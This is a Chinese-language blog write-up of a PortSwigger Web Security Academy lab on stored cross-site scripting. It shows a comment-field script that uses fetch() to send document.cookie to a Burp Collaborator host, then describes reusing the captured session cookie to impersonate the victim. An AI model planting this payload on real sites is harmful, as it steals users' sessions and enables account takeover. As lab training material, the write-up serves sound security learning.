Lab: Exploiting cross-site scripting to steal cookies:利用XSS竊取Cookie
阿新 • • 發佈:2021-08-24
靶場內容
本實驗包含部落格評論功能中的儲存型 XSS漏洞。一個模擬的受害者使用者在釋出後檢視所有評論。為解決實驗室,利用該漏洞竊取受害者的會話cookie,然後使用該cookie來冒充受害者。
注意
為了防止 Academy 平臺被用來攻擊第三方,我們的防火牆會阻止實驗室與任意外部系統之間的互動。要解決實驗室問題,您應該使用 Burp Collaborator 的預設公共伺服器 ( burpcollaborator.net)。
一些使用者會注意到這個實驗室有一個不需要 Burp Collaborator 的替代解決方案。然而,它遠沒有洩露 cookie 那麼微妙。
解決方法
- XSS竊取Cookie老生常談了,最喜歡用的就是竊取Cookie了
- 這個靶場還是很細的:
- 找到一個評論區,將JavaScript程式碼複製到評論區
<script>
fetch('https://8r0adoyya8wnsy5t6m21h3twenkd82.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
- fetch裡面的URL內容是Burp Collaborator Client出來的payload
- 之後開啟Burp Collaborator Client,可以發現有個HTTP報文
- 點開它,裡面是管理員的session
- 之後使用這個cookie去覆蓋home頁面的cookie就可以解決戰鬥了
本文來自部落格園,作者:{Zeker62},轉載請註明原文連結:https://www.cnblogs.com/Zeker62/p/15182658.html